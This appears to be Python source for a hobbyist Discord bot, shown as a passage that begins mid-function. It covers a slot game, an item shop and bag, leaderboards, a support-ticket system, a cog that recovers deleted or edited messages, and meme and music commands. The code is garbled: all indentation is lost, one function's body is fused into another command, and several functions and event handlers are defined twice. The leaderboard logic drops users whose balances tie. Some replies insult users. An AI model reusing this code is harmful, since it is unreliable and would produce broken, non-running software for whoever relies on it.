await update_bank(ctx.author, amount*5)
elif final[0] == final[1] or final[1] == final[2]:
embed = discord.Embed(
title=f"{ctx.author.name}'s Slot Game",
colour=discord.Colour.green()
)
embed.add_field(name="Result:", value=f"{final[0]} {final[1]} {final[2]}", inline=False)
embed.add_field(name="Amount Won:", value=f"{amount*2} coins... thats all you could get?", inline=False)
await ctx.send(embed=embed)
await update_bank(ctx.author, amount*2)
else:
embed = discord.Embed(
title=f"{ctx.author.name}'s Slot Game",
colour=discord.Colour.red()
)
embed.add_field(name="Result:", value=f"{final[0]}{final[1]}{final[2]}", inline=False)
embed.add_field(name="You lost...", value="You lost?, No wonder your mom disowned you", inline=False)
embed.add_field(name="Amount Lost:", value=f"{amount} coins", inline=False)
await ctx.send(embed=embed)
#merge thing 1
await update_bank(ctx.author,-1*amount)
@bot.command()
async def bag(ctx):
await open_account(ctx.author)
user = ctx.author
users = await get_bank_data()
try:
bag = users[str(user.id)]["bag"]
except:
bag = []
em = discord.Embed(title = "Bag")
for item in bag:
name = item["item"]
amount = item["amount"]
em.add_field(name = name, value = amount)
await ctx.send(embed = em)
async def buy_this(user,item_name,amount):
item_name = item_name.lower()
name_ = None
for item in mainshop:
name = item["name"].lower()
if name == item_name:
name_ = name
price = item["price"]
break
if name_ == None:
return [False,1]
cost = price*amount
users = await get_bank_data()
bal = await update_bank(user)
if bal[0]<cost:
return [False,2]
try:
index = 0
t = None
for thing in users[str(user.id)]["bag"]:
n = thing["item"]
if n == item_name:
old_amt = thing["amount"]
new_amt = old_amt + amount
users[str(user.id)]["bag"][index]["amount"] = new_amt
t = 1
break
index+=1
if t == None:
obj = {"item":item_name , "amount" : amount}
users[str(user.id)]["bag"].append(obj)
except:
obj = {"item":item_name , "amount" : amount}
users[str(user.id)]["bag"] = [obj]
with open("mainbank.json","w") as f:
json.dump(users,f)
await update_bank(user,cost*-1,"wallet")
return [True,"Worked"]
@bot.command()
async def sell(ctx,item,amount = 1):
await open_account(ctx.author)
res = await sell_this(ctx.author,item,amount)
if not res[0]:
if res[1]==1:
await ctx.send("That Object isn't there!")
return
if res[1]==2:
await ctx.send(f"You don't have {amount} {item} in your bag.")
return
if res[1]==3:
await ctx.send(f"You don't have {item} in your bag.")
return
await ctx.send(f"You just sold {amount} {item}.")
if name_ == None:
return [False,1]
cost = price*amount
users = await get_bank_data()
bal = await update_bank(user)
try:
index = 0
t = None
for thing in users[str(user.id)]["bag"]:
n = thing["item"]
if n == item_name:
old_amt = thing["amount"]
new_amt = old_amt - amount
if new_amt < 0:
return [False,2]
users[str(user.id)]["bag"][index]["amount"] = new_amt
t = 1
break
index+=1
if t == None:
return [False,3]
except:
return [False,3]
with open("mainbank.json","w") as f:
json.dump(users,f)
await update_bank(user,cost,"wallet")
return [True,"Worked"]
@bot.command(aliases = ["lb"])
@commands.guild_only()
async def leaderboard(ctx,x = 10):
users = await get_bank_data()
leader_board = {}
total = []
for user in users:
name = int(user)
total_amount = users[user]["wallet"] + users[user]["bank"]
leader_board[total_amount] = name
total.append(total_amount)
total = sorted(total,reverse=True)
em = discord.Embed(title = f"Top {x} Richest People in this **server**" , description = "This is decided on the basis of raw money in the bank and wallet",color = discord.Color(0xfa43ee))
index = 1
for amt in total:
id_ = leader_board[amt]
member = bot.get_user(id_)
name = member.name
em.add_field(name = f"{index}. {name}" , value = f"{amt}", inline = False)
if index == x:
break
else:
index += 1
await ctx.send(embed = em)
async def open_account(user):
users = await get_bank_data()
if str(user.id) in users:
return False
else:
users[str(user.id)] = {}
users[str(user.id)]["wallet"] = 0
users[str(user.id)]["bank"] = 0
with open('mainbank.json','w') as f:
json.dump(users,f)
return True
# @bot.command()
# async def test(ctx,):
# if item=='laptop':
# print("f")
@bot.command(aliases = ["lbg"])
async def leaderboardglobal(ctx,x = 10):
users = await get_bank_data()
leader_board = {}
total = []
for user in users:
name = int(user)
total_amount = users[user]["wallet"] + users[user]["bank"]
leader_board[total_amount] = name
total.append(total_amount)
total = sorted(total,reverse=True)
em = discord.Embed(title = f"Top {x} Richest People in the **world**" , description = "This is decided on the basis of raw money in the bank and wallet",color = discord.Color(0xfa43ee))
index = 1
for amt in total:
id_ = leader_board[amt]
member = bot.get_user(id_)
name = member.name
em.add_field(name = f"{index}. {name}" , value = f"{amt}", inline = False)
if index == x:
break
else:
index += 1
await ctx.send(embed = em)
async def open_account(user):
users = await get_bank_data()
if str(user.id) in users:
return False
else:
users[str(user.id)] = {}
users[str(user.id)]["wallet"] = 0
users[str(user.id)]["bank"] = 0
with open('mainbank.json','w') as f:
json.dump(users,f)
return True
async def get_bank_data():
with open('mainbank.json','r') as f:
users = json.load(f)
return users
async def update_bank(user,change=0, mode = 'wallet'):
users = await get_bank_data()
users[str(user.id)][mode] += change
with open('mainbank.json','w') as f:
json.dump(users,f)
bal = users[str(user.id)]['wallet'],users[str(user.id)]['bank']
return bal
@bot.command(pass_context=True)
async def afg(ctx,role: discord.Role, user: discord.Member):
await user.add_roles(role)
await ctx.send("f")
@bot.command()
async def helpt(ctx):
with open("data.json") as f:
data = json.load(f)
valid_user = False
for role_id in data["verified-roles"]:
try:
if ctx.guild.get_role(role_id) in ctx.author.roles:
valid_user = True
except:
pass
if ctx.author.guild_permissions.administrator or valid_user:
em = discord.Embed(title="Stonk Tickets Help", description="", color=0x00a8ff)
em.add_field(name="`+new <message>`", value="This creates a new ticket. Add any words after the command if you'd like to send a message when we initially create your ticket.")
em.add_field(name="`+close`", value="Use this to close a ticket. This command only works in ticket channels.")
em.add_field(name="`+addaccess <role_id>`", value="This can be used to give a specific role access to all tickets. This command can only be run if you have an admin-level role for this bot.")
em.add_field(name="`+delaccess <role_id>`", value="This can be used to remove a specific role's access to all tickets. This command can only be run if you have an admin-level role for this bot.")
em.add_field(name="`+addpingedrole <role_id>`", value="This command adds a role to the list of roles that are pinged when a new ticket is created. This command can only be run if you have an admin-level role for this bot.")
em.add_field(name="`+delpingedrole <role_id>`", value="This command removes a role from the list of roles that are pinged when a new ticket is created. This command can only be run if you have an admin-level role for this bot.")
em.add_field(name="`+addadminrole <role_id>`", value="This command gives all users with a specific role access to the admin-level commands for the bot, such as `.addpingedrole` and `.addaccess`. This command can only be run by users who have administrator permissions for the entire server.")
em.add_field(name="`+deladminrole <role_id>`", value="This command removes access for all users with the specified role to the admin-level commands for the bot, such as `.addpingedrole` and `.addaccess`. This command can only be run by users who have administrator permissions for the entire server.")
em.set_footer(text="Stonk Bot:bot made by DragonRoyal#7111")
await ctx.send(embed=em)
reaction = "📜"
await ctx.message.add_reaction(emoji=reaction)
else:
em = discord.Embed(title = "Distrupt Tickets Help", description ="", color = 0x00a8ff)
em.add_field(name="`+new <message>`", value="This creates a new ticket. Add any words after the command if you'd like to send a message when we initially create your ticket.")
em.add_field(name="`.close`", value="Use this to close a ticket. This command only works in ticket channels.")
em.set_footer(text="Doge Coin is cool")
await ctx.send(embed=em)
@bot.command( aliases=['new','support'])
async def ticket(ctx, *, args = None):
await bot.wait_until_ready()
if args == None:
message_content = "Please wait, we will be with you shortly!"
else:
message_content = "".join(args)
with open("data.json") as f:
data = json.load(f)
ticket_number = int(data["ticket-counter"])
ticket_number += 1
ticket_channel = await ctx.guild.create_text_channel("ticket-{}".format(ticket_number))
await ticket_channel.set_permissions(ctx.guild.get_role(ctx.guild.id), send_messages=False, read_messages=False)
for role_id in data["valid-roles"]:
role = ctx.guild.get_role(role_id)
await ticket_channel.set_permissions(role, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
em = discord.Embed(title="New ticket from {}#{}".format(ctx.author.name, ctx.author.discriminator), description= "{}".format(message_content), color=0x00a8ff)
await ticket_channel.send(embed=em)
pinged_msg_content = ""
non_mentionable_roles = []
if data["pinged-roles"] != []:
for role_id in data["pinged-roles"]:
role = ctx.guild.get_role(role_id)
pinged_msg_content += role.mention
pinged_msg_content += " "
if role.mentionable:
pass
else:
await role.edit(mentionable=True)
non_mentionable_roles.append(role)
await ticket_channel.send(pinged_msg_content)
for role in non_mentionable_roles:
await role.edit(mentionable=False)
data["ticket-channel-ids"].append(ticket_channel.id)
data["ticket-counter"] = int(ticket_number)
with open("data.json", 'w') as f:
json.dump(data, f)
created_em = discord.Embed(title="Auroris Tickets", description="Your ticket has been created at {},".format(ticket_channel.mention), color=0x00a8ff)
await ctx.send(embed=created_em)
@bot.command()
async def close(ctx):
with open('data.json') as f:
data = json.load(f)
if ctx.channel.id in data["ticket-channel-ids"]:
channel_id = ctx.channel.id
def check(message):
return message.author == ctx.author and message.channel == ctx.channel and message.content.lower() == "close"
try:
em = discord.Embed(title="Stonk Tickets", description="Are you sure you want to close this ticket? Reply with `close` if you are sure.", color=0x00a8ff)
await ctx.send(embed=em)
await bot.wait_for('message', check=check, timeout=60)
await ctx.channel.delete()
index = data["ticket-channel-ids"].index(channel_id)
del data["ticket-channel-ids"][index]
with open('data.json', 'w') as f:
json.dump(data, f)
except asyncio.TimeoutError:
em = discord.Embed(title="Stonk Tickets", description="You have run out of time to close this ticket. Please run the command again.", color=0x00a8ff)
await ctx.send(embed=em)
@bot.command()
async def addaccess(ctx, role_id=None):
with open('data.json') as f:
data = json.load(f)
valid_user = False
for role_id in data["verified-roles"]:
try:
if ctx.guild.get_role(role_id) in ctx.author.roles:
valid_user = True
except:
pass
if valid_user or ctx.author.guild_permissions.administrator:
role_id = int(role_id)
if role_id not in data["valid-roles"]:
try:
role = ctx.guild.get_role(role_id)
with open("data.json") as f:
data = json.load(f)
data["valid-roles"].append(role_id)
with open('data.json', 'w') as f:
json.dump(data, f)
em = discord.Embed(title="Auroris Tickets", description="You have successfully added `{}` to the list of roles with access to tickets.".format(role.name), color=0x00a8ff)
await ctx.send(embed=em)
except:
em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
await ctx.send(embed=em)
else:
em = discord.Embed(title="Auroris Tickets", description="That role already has access to tickets!", color=0x00a8ff)
await ctx.send(embed=em)
else:
em = discord.Embed(title="Auroris Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
await ctx.send(embed=em)
@bot.command()
async def delaccess(ctx, role_id=None):
with open('data.json') as f:
data = json.load(f)
valid_user = False
for role_id in data["verified-roles"]:
try:
if ctx.guild.get_role(role_id) in ctx.author.roles:
valid_user = True
except:
pass
if valid_user or ctx.author.guild_permissions.administrator:
try:
role_id = int(role_id)
role = ctx.guild.get_role(role_id)
with open("data.json") as f:
data = json.load(f)
valid_roles = data["valid-roles"]
if role_id in valid_roles:
index = valid_roles.index(role_id)
del valid_roles[index]
data["valid-roles"] = valid_roles
with open('data.json', 'w') as f:
json.dump(data, f)
em = discord.Embed(title="Auroris Tickets", description="You have successfully removed `{}` from the list of roles with access to tickets.".format(role.name), color=0x00a8ff)
await ctx.send(embed=em)
else:
em = discord.Embed(title="Auroris Tickets", description="That role already doesn't have access to tickets!", color=0x00a8ff)
await ctx.send(embed=em)
except:
em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
await ctx.send(embed=em)
else:
em = discord.Embed(title="Auroris Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
await ctx.send(embed=em)
@bot.command()
async def addpingedrole(ctx, role_id=None):
with open('data.json') as f:
data = json.load(f)
valid_user = False
for role_id in data["verified-roles"]:
try:
if ctx.guild.get_role(role_id) in ctx.author.roles:
valid_user = True
except:
pass
if valid_user or ctx.author.guild_permissions.administrator:
role_id = int(role_id)
if role_id not in data["pinged-roles"]:
try:
role = ctx.guild.get_role(role_id)
with open("data.json") as f:
data = json.load(f)
data["pinged-roles"].append(role_id)
with open('data.json', 'w') as f:
json.dump(data, f)
em = discord.Embed(title="Stonk Tickets", description="You have successfully added `{}` to the list of roles that get pinged when new tickets are created!".format(role.name), color=0x00a8ff)
await ctx.send(embed=em)
except:
em = discord.Embed(title="Stonk Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
await ctx.send(embed=em)
else:
em = discord.Embed(title="Stonk Tickets", description="That role already receives pings when tickets are created.", color=0x00a8ff)
await ctx.send(embed=em)
else:
em = discord.Embed(title="Stonk Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
await ctx.send(embed=em)
@bot.command()
async def testcool(ctx):
print(item)
@bot.command()
async def delpingedrole(ctx, role_id=None):
with open('data.json') as f:
data = json.load(f)
valid_user = False
for role_id in data["verified-roles"]:
try:
if ctx.guild.get_role(role_id) in ctx.author.roles:
valid_user = True
except:
pass
if valid_user or ctx.author.guild_permissions.administrator:
try:
role_id = int(role_id)
role = ctx.guild.get_role(role_id)
with open("data.json") as f:
data = json.load(f)
pinged_roles = data["pinged-roles"]
if role_id in pinged_roles:
index = pinged_roles.index(role_id)
del pinged_roles[index]
data["pinged-roles"] = pinged_roles
with open('data.json', 'w') as f:
json.dump(data, f)
em = discord.Embed(title="Auroris Tickets", description="You have successfully removed `{}` from the list of roles that get pinged when new tickets are created.".format(role.name), color=0x00a8ff)
await ctx.send(embed=em)
else:
em = discord.Embed(title="Auroris Tickets", description="That role already isn't getting pinged when new tickets are created!", color=0x00a8ff)
await ctx.send(embed=em)
except:
em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
await ctx.send(embed=em)
else:
em = discord.Embed(title="Auroris Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
await ctx.send(embed=em)
@bot.command()
@has_permissions(administrator=True)
async def addadminrole(ctx, role_id=None):
try:
role_id = int(role_id)
role = ctx.guild.get_role(role_id)
with open("data.json") as f:
data = json.load(f)
data["verified-roles"].append(role_id)
with open('data.json', 'w') as f:
json.dump(data, f)
em = discord.Embed(title="Auroris Tickets", description="You have successfully added `{}` to the list of roles that can run admin-level commands!".format(role.name), color=0x00a8ff)
await ctx.send(embed=em)
except:
em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
await ctx.send(embed=em)
@bot.command()
@has_permissions(administrator=True)
async def deladminrole(ctx, role_id=None):
try:
role_id = int(role_id)
role = ctx.guild.get_role(role_id)
with open("data.json") as f:
data = json.load(f)
admin_roles = data["verified-roles"]
if role_id in admin_roles:
index = admin_roles.index(role_id)
del admin_roles[index]
data["verified-roles"] = admin_roles
with open('data.json', 'w') as f:
json.dump(data, f)
em = discord.Embed(title="Auroris Tickets", description="You have successfully removed `{}` from the list of roles that get pinged when new tickets are created.".format(role.name), color=0x00a8ff)
await ctx.send(embed=em)
else:
em = discord.Embed(title="Auroris Tickets", description="That role isn't getting pinged when new tickets are created!", color=0x00a8ff)
await ctx.send(embed=em)
except:
em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
await ctx.send(embed=em)
@bot.event
async def on_message(message):
if message.content.startswith('you are'):
await message.channel.send('NO U')
@bot.event
async def on_message(message):
if bot.user.mentioned_in(message):
await message.channel.send('I see you are to good to just use +help for the commands. (Or your just mocking me or something) So for that reason i will make you cease to exist <a:_3:845491804429484064>')
#on bot join msg
@bot.event
async def on_guild_join(guild):
general = find(lambda x: x.name == 'general', guild.text_channels)
if general and general.permissions_for(guild.me).send_messages:
await general.send('Hello {}! My prefix is + Do +help to learn more about my commands or +helpdm for the help commands to be dm'.format(guild.name))
#<EMAIL>()
#async def meme(ctx):
# async with aiohttp.BotSession() as cs:
# async with cs.get('https://www.reddit.com/r/dankmemes/new.json?sort=top') or cs.get('https://www.reddit.com/r/memes/new.json?sort=top') or cs.get('https://www.reddit.com/r/programmingmemes/new.json?sort=top') or cs.get('https://www.reddit.com/r/cleanmemes/new.json?sort=top') as r:
# res = await r.json()
#num = random.randint(0, len(res['data']['children'])-1)
#m = res['data']['children'] [num]['data']['url']
#e = Embed(description = f"**[{res['data']['children'] [num]['data']['title']}]({m})**", color=amberz)
# e.set_footer(text= res['data']['children'] [num]['data']['author'], icon_url=ctx.guild.icon_url)
#e.set_image(url = res['data']['children'] [num]['data']['url'])
# await ctx.send(embed=e)
#--------------REDDIT MEME GENERATION!----------------
# wont work
#reddit = asyncpraw.Reddit(client_id ='OK4gxau76j-sPw',
#client_secret ='<KEY>', user_agent = 'praw', username ='Dragonroyal', password = '<PASSWORD>',)
#subreddit = reddit.subreddit('memes')
#top = subreddit.top(Limit = 5)
#for submisson in top:
# print(submission.title)
#print("F")
#@bot.command()
#async def memeswork(ctx):
# print("Ff")
#subreddit = reddit.subreddit('memes')
#top = subreddit.top(Limit = 50)
#all_subs =[]
#for submission in top:
# all_subs.append(submission)
#print("FFf")
#random_sub = random.choice(all_subs)
#print("fffds")
#name = random_sub.title
#url = random_sub.url
#em = discord.Embed(title=name)
#em.set_image(url=url)
#print("ejksjs")
#await ctx.send(embed = em)
#@bot.command()
#async def memef(ctx):
# memes_submissions = reddit.subreddit('memes').hot()
# post_to_pick = random.randint(1, 10)
# for i in range(0, post_to_pick):
# submission = next(x for x in memes_submissions if not x.stickied)
# await bot.say(submission.url)
#who is command
@bot.command(aliases=["user"])
async def whois(ctx, member:discord.Member=None):
if member is None:
member = ctx.author
user = member
roles = [role for role in member.roles]
allroles = [role.mention for role in roles[1:]]
embed = discord.Embed(title = member.name , describtion = member.mention ,color = discord.Color(0x7289DA))
embed.add_field(name="Display Name:", value=member.display_name)
embed.add_field(name = "ID", value = member.id , inline = True)
embed.add_field(name="Created Account On:", value=member.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"))
embed.add_field(name="Joined Server On:", value=member.joined_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"))
embed.add_field(name=f"Roles (amount: {len(roles)}):", value="\n".join(allroles))
embed.add_field(name="Highest Role:", value=f"{member.top_role.mention if member.top_role else 'N/A'}")
embed.set_thumbnail(url = member.avatar_url)
embed.set_footer(icon_url = ctx.author.avatar_url, text = f"Requested by {ctx.author.name}")
await ctx.send(embed=embed)
@bot.command()
async def botservers(ctx):
await ctx.send("I'm in " + str(len(bot.guilds)) + " servers!")
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def kingruless(ctx):
embed = discord.Embed(color = discord.Color.blue())
embed.set_author(name='Rules📓')
embed.add_field(name='1.', value=' Please dont talk about religion or politics. People can be really sensitive about this stuff, so dont do it here, thanks!')
embed.add_field(name='2.', value='No NSFW, sexist, racist, homophobic, transphobic, misogynistic or inappropriate content or anything remotely similar. Respect people, its the 21st century. This includes any slurs.')
embed.add_field(name='3.', value='Causing drama is an instant punishment. Its simple, please dont.',)
embed.add_field(name='6', value='Attempting to override a punishment or using alternate accounts will lead to all your accounts being banned. This includes leaving to bypass a mute.',)
embed.add_field(name='7', value='Please keep discussion in English only. This includes voice chats.',)
embed.add_field(name='8', value='Dont spam or use copy pastes here. Theyre not nice and make chat hard to manage.')
embed.add_field(name='9', value='Absolutely no advertising will be allowed without prior permission from a moderator. This includes YouTube videos, Twitch channels & Discord servers. Please dont link Zoom, Google Meet, or similar services too, as well as advertising art commissions.',)
embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
embed.set_footer(text="Imagine not voting for this bot in top.gg")
await ctx.send(embed=embed)
# async def on_message(message):
# if bot.user == message.author:
# return
# if message.channel.id == 842336034431827988:
# msg = message.content
# key = os.getenv('key')
# header = {"x-api-key": key}
# dev_name = "ChaoticNebula"
# type = "stable"
# params = {'type':type , 'message':msg, 'dev_name': "ChaoticNebula", 'bot_name': "Ai Chat"}
# async with aiohttp.ClientSession(headers=header) as session:
# async with session.get(f'https://api.pgamerx.com/v3/ai/response', params=params) as resp:
# text = await resp.json()
# await message.channel.send(text[0]["message"])
# else:
# pass
#test
#if this works then WOW
@commands.group(invoke_without_command=True)
async def use(self, ctx):
await ctx.send("You need to specify an item to use.")
@use.command()
@commands.cooldown(1, 15, commands.BucketType.user)
async def watch(self, ctx):
await self.open_account(ctx.author)
amount = await self.item_func(ctx.author, "watch")
if amount[0] < 1:
await ctx.send("You can't use a watch that you don't have!")
else:
chance = random.randint(0, 3)
if chance == 1:
await ctx.send("You tried to give someone the time, but they didn't give a shit.")
elif chance == 2:
await ctx.send("Someone got angry at you and smashed your watch.")
await self.item_func(ctx.author, "watch", -1)
else:
tip = random.randint(0, 50)
await ctx.send(f"You gave someone the time and they gave you a {tip} moner tip!")
await self.update_bank(ctx.author, tip)
@use.command()
@commands.cooldown(1, 30, commands.BucketType.user)
async def laptop(self, ctx):
await open_account(ctx.author)
amount = await item_func(ctx.author, "laptop")
if amount[0] < 1:
await ctx.send("You can't use a computer that you don't have!")
else:
chance = random.randint(0, 3)
games = ["Rocket League", "Minecraft", "Minceraft", "Call of Duty: Modern Warfare",
"Call of Duty: Cold War", "Super Mario Bros.", "Super Mario Galaxy", "Mario Kart", "Halo 3", "Doom",
"CS:GO", "Overwatch", "Rainbow Six: Siege", "Uno With Friends", "Dark Souls", "<NAME>", "The Witcher",
"Snake"]
if chance == 2:
await ctx.send(f"You lost {random.choice(games)} and smashed your computer.")
await item_func(ctx.author, "computer", -1)
elif chance == 1:
await ctx.send(f"You lost {random.choice(games)} but decided not to lose your temper.")
else:
reward = random.randint(1, 2000)
await ctx.send(f"You won {random.choice(games)} and got rewarded with {reward} moners!")
await update_bank(ctx.author, reward)
@bot.command()
async def hi2(ctx):
await ctx.send("it worked")
@bot.command() # Normal message wait_for
async def testm(ctx):
await ctx.send("Do you want me to say hi? `(y/n)`")
msg = await bot.wait_for('message', timeout=15.0)
if msg.content == 'y':
await ctx.send("hi")
else:
await ctx.send("ok i wont")
# if ctx.channel.is_nsfw() == True:
# pass
# else:
# await ctx.send("Imagine wanting to look at nsfw things IN A PUBLIC CHAT")
# return
# if ransub.is_self:
# embed = discord.Embed(title=f"{ransub.author}'s Post", colour=ctx.author.colour)
# embed.add_field(name=ransub.title, value=ransub.selftext)
# embed.set_footer(text=f"❤ {ransub.ups} | 💬 {ransub.num_comments}")
# else:
# embed = discord.Embed(title=ransub.title, colour=ctx.author.colour, url=ransub.url)
# embed.set_footer(text=f"Posted by {ransub.author} on Reddit. | ❤ {ransub.ups} | 💬 {ransub.num_comments}")
# embed.set_image(url=ransub.url)
# await message.delete()
# await ctx.send(embed=embed)
# except:
# await ctx.send("Something went wrong. This may be the fact that the subreddit does not exist or is locked.")
class snipe(commands.Cog, description="snipe commands"):
def __init__(self, bot):
self.bot = bot
self.index = 0
self.snipe_cache = {}
self.esnipe_cache = {}
@commands.Cog.listener()
async def on_message_edit(self, before, after):
if before.author.bot:
return
self.esnipe_cache[before.channel.id] = {}
self.esnipe_cache[before.channel.id]["before"] = [before.content, before.author]
self.esnipe_cache[before.channel.id]["after"] = [after.content, after.author]
await asyncio.sleep(60)
self.esnipe_cache.pop(before.channel.id, None)
@commands.Cog.listener()
async def on_message_delete(self, message):
if message.author.bot:
return
self.snipe_cache[message.channel.id] = [message.content, message.author]
await asyncio.sleep(60)
self.snipe_cache.pop(message.channel.id, None)
@commands.command(name="snipe", brief="Retrieves a recent deleted message")
async def snipe(self, ctx):
"""
Acts like a message log, but for channel specific and command only.\n
Only returns the most recent message.
A bot's deleted message is ignored.
"""
channel = ctx.channel
author = ctx.author
try:
em = Embed(
name=f"Last deleted message in #{channel.name}",
description=self.snipe_cache[channel.id][0],
timestamp=datetime.datetime.utcnow(),
colour=discord.Color.random(),
)
em.set_author(
name=f"{self.snipe_cache[channel.id][1]}",
icon_url=f"{self.snipe_cache[channel.id][1].avatar_url}",
)
em.set_footer(text=f"Sniped by: {author}")
return await ctx.send(embed=em)
except KeyError:
return await ctx.send("There's nothing to snipe!")
@commands.command(name="editsnipe", brief="Retrieves a recently edited message")
async def editsnipe(self, ctx):
"""
Same as `snipe`, but for edited messages.
A bot's edited message is ignored.
"""
channel = ctx.channel
author = ctx.author
try:
em = Embed(
name=f"Last edited message in #{channel.name}",
description="**Before:**\n"
f"+ {self.esnipe_cache[channel.id]['before'][0]}\n"
f"\n**After:**\n- {self.esnipe_cache[channel.id]['after'][0]}",
timestamp=datetime.datetime.utcnow(),
colour=discord.Color.random(),
)
em.set_author(
name=f"{self.esnipe_cache[channel.id]['before'][1]}",
icon_url=f"{self.esnipe_cache[channel.id]['before'][1].avatar_url}",
)
em.set_footer(text=f"Sniped by: {author}")
return await ctx.send(embed=em)
except KeyError:
return await ctx.send("There's nothing to snipe!")
@bot.command()
async def hi(ctx):
await ctx.send("it worked")
class Player(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.song_queue = {}
self.setup()
def setup(self):
for guild in self.bot.guilds:
self.song_queue[guild.id] = []
async def check_queue(self, ctx):
if len(self.song_queue[ctx.guild.id]) > 0:
ctx.voice_client.stop()
await self.play_song(ctx, self.song_queue[ctx.guild.id][0])
self.song_queue[ctx.guild.id].pop(0)
async def search_song(self, amount, song, get_url=False):
info = await self.bot.loop.run_in_executor(None, lambda: youtube_dl.YoutubeDL({"format" : "bestaudio", "quiet" : True}).extract_info(f"ytsearch{amount}:{song}", download=False, ie_key="YoutubeSearch"))
if len(info["entries"]) == 0: return None
return [entry["webpage_url"] for entry in info["entries"]] if get_url else info
async def play_song(self, ctx, song):
url = pafy.new(song).getbestaudio().url
ctx.voice_client.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(url)), after=lambda error: self.bot.loop.create_task(self.check_queue(ctx)))
ctx.voice_client.source.volume = 0.5
@commands.command()
async def join(self, ctx):
connected = ctx.author.voice
if not connected:
await ctx.send("You need to be connected in a voice channel to use this command!")
return
global vc
vc = await connected.channel.connect()
# if ctx.author.voice is None:
# return await ctx.send("You are not connected to a voice channel, please connect to the channel you want the bot to join.")
#
# if ctx.voice_client is not None:
# await ctx.voice_client.disconnect()
# else:
# await ctx.author.voice.channel.connect()
class Fun(commands.Cog, description="Fun commands"):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=["memes"], brief="Shows a meme from reddit")
async def meme(self, ctx):
async with self.bot.session() as cs:
async with cs.get("https://www.reddit.com/r/memes/random/.json") as res:
res = await res.json()
image = res[0]["data"]["children"][0]["data"]["url"]
permalink = res[0]["data"]["children"][0]["data"]["permalink"]
url = f"https://reddit.com{permalink}"
title = res[0]["data"]["children"][0]["data"]["title"]
ups = res[0]["data"]["children"][0]["data"]["ups"]
downs = res[0]["data"]["children"][0]["data"]["downs"]
comments = res[0]["data"]["children"][0]["data"]["num_comments"]
em = Embed(colour=discord.Color.blurple(), title=title, url=url)
em.set_image(url=image)
em.set_footer(text=f"👍 {ups} 👎 {downs} 💬 {comments}")
await ctx.send(embed=em)
def setup(bot):
bot.add_cog(Fun(bot))
# @commands.command()
# async def play(self, ctx, *, song=None):
# if song is None:
# return await ctx.send("You must include a song to play.")
# if ctx.voice_client is None:
# return await ctx.send("I must be in a voice channel to play a song.")
# # handle song where song isn't url
# if not ("youtube.com/watch?" in song or "https://youtu.be/" in song):
# await ctx.send("Searching for song, this may take a few seconds.")
# result = await self.search_song(1, song, get_url=True)
# if result is None:
# return await ctx.send("Sorry, I could not find the given song, try using my search command.")
# song = result[0]
# if ctx.voice_client.source is not None:
# queue_len = len(self.song_queue[ctx.guild.id])
# if queue_len < 10:
# self.song_queue[ctx.guild.id].append(song)
# return await ctx.send(f"I am currently playing a song, this song has been added to the queue at position: {queue_len+1}.")
# else:
# return await ctx.send("Sorry, I can only queue up to 10 songs, please wait for the current song to finish.")
# await self.play_song(ctx, song)
# await ctx.send(f"Now playing: {song}")
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def music(ctx):
embed = discord.Embed(color = discord.Color.blue())
embed.set_author(name='Music commands')
embed.add_field(name='+join', value='Joins the vc', inline=False)
embed.add_field(name='+play (song name or url)', value='The bot plays the music example of use: +play rise or +play https://www.youtube.com/watch?v=fB8TyLTD7EE',
inline=False)
embed.add_field(name='+leave', value='Leaves the vc', inline=False)
embed.add_field(name='+pause', value='pauses the current song playing', inline=False)
embed.add_field(name='+resume', value='resumes the paused song', inline=False)
embed.add_field(name='+about', value='Read some useless stuff', inline=False)
embed.add_field(name='+about', value='Read some useless stuff', inline=False)
embed.add_field(name='+loop', value='loops a song you specified', inline=False)
embed.add_field(name='+queue', value='queue a song', inline=False)
embed.add_field(name='+np', value='says the song currently playing', inline=False)
embed.add_field(name='+leave', value='Leaves the vc', inline=False)
embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
embed.set_footer(text="not much in this command right?")
await ctx.send(embed=embed)
music = DiscordUtils.Music()
@bot.command()
async def join(ctx):
await ctx.author.voice.channel.connect() #Joins author's voice channel
embed=discord.Embed(title="Joined Voice Channel!", color=discord.Color.random())
embed.set_footer(text="Consider voting for the bot")
await ctx.send(embed=embed)
@bot.command()
async def leave(ctx):
await ctx.voice_client.disconnect()
embed=discord.Embed(title="Left Voice Channel!", color=discord.Color.random())
embed.set_footer(text="How are our music commands?")
await ctx.send(embed=embed)
@bot.command()
async def play(ctx, *, url):
player = music.get_player(guild_id=ctx.guild.id)
if not player:
#print("f")
#em=discord.Embed(title=f'The bots not even in a voice channel',color=discord.Color.random())
# em.set_footer(text='At least make the bot join vc <:smh:849114935408853022>')
#await ctx.send(embed=em)
player = music.create_player(ctx, ffmpeg_error_betterfix=True)
if player is None:
await ctx.send("I am not connected to a voice channel.")
if not ctx.voice_client.is_playing():
await player.queue(url, search=True)
song = await player.play()
em=discord.Embed(title=f"Playing {song.name}", color=discord.Color.random())
em.set_footer(text='Spread the word about stonk bot!')
await ctx.send(embed=em)
print(url)
else:
song = await player.queue(url, search=True)
await ctx.send(f"Queued {song.name}")
